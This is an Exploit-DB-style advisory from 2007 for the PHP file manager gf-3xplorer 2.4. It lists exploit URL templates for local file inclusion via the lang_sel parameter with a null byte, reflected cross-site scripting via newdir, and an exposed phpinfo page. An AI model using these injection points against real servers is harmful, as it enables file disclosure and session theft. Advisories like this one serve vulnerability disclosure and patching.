gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion
Author: MhZ91
type: webapps
platform: php
port:
date_added: 2007-12-17
date_updated: 2016-10-20
verified: 1
codes: OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comGF-3XPLORER_2.4_.rar
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Local File Inclusion & Full Path Discolusure
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download script: http://sourceforge.net/projects/gf-3xplorer/
# magic_quotes_gpc = Off
# Exploit
# http://[site]/[path]/updater.php?lang_sel=[LFI]%00
# http://[site]/[path]/thumber.php?lang_sel=[LFI]%00
---------------------------------------------------------------
# Xss
# http://[site]/[path]/index_3x.php?newdir=">[Xss]
# And other more..
---------------------------------------------------------------
# phpinfo(); View
# http://[site]/GF-3XPLORER/explorer/phpinfo.php
---------------------------------------------------------------
# milw0rm.com [2007-12-18]